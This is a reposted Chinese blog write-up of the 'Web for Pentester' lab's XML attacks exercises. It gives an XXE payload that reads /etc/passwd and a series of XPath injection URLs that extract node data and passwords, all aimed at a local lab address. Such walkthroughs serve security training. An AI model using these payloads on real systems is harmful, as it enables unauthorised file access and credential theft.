码迷,mamicode.com
首页 > Web开发 > 详细

Web for pentester_writeup之XML attacks篇

时间:2019-09-25 15:37:26      阅读:95      评论:0      收藏:0      [点我收藏+]

标签:图片   writeup   code   pass   mil   input   mic   pat   family   

Web for pentester_writeup之XML attacks篇

XML attacks(XML攻击)

Example 1 - XML外部实体注入(XXE)

技术图片

Payload
http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>

技术图片

Example 2 - Xpath注入

技术图片

输入一个单引号,报错,分析报错信息发现xpath函数,猜测是xpath注入
<1> http://192.168.219.136/xml/example2.php?name=hacker‘ and ‘1‘ =‘1
技术图片

<2> http://192.168.219.136/xml/example2.php?name=hacker‘ and ‘1‘ =‘2

技术图片

<3> http://192.168.219.136/xml/example2.php?name=hacker‘ or ‘1‘ =‘1

技术图片

<4> http://192.168.219.136/xml/example2.php?name=hacker‘ or ‘1‘ =‘2

技术图片

可知XPath的代码为 [PARENT NODES]/name[.=‘[INPUT]‘]/[CHILD NODES]

Payload
http://192.168.219.136/xml/example2.php?name=‘ or 1=1]/parent::*/child::node()%00

技术图片

http://192.168.219.136/xml/example2.php?name=hacker‘ or 1=1]/parent::*/password%00

技术图片

Web for pentester_writeup之XML attacks篇

标签:图片   writeup   code   pass   mil   input   mic   pat   family   

原文地址:https://www.cnblogs.com/liliyuanshangcao/p/11322907.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!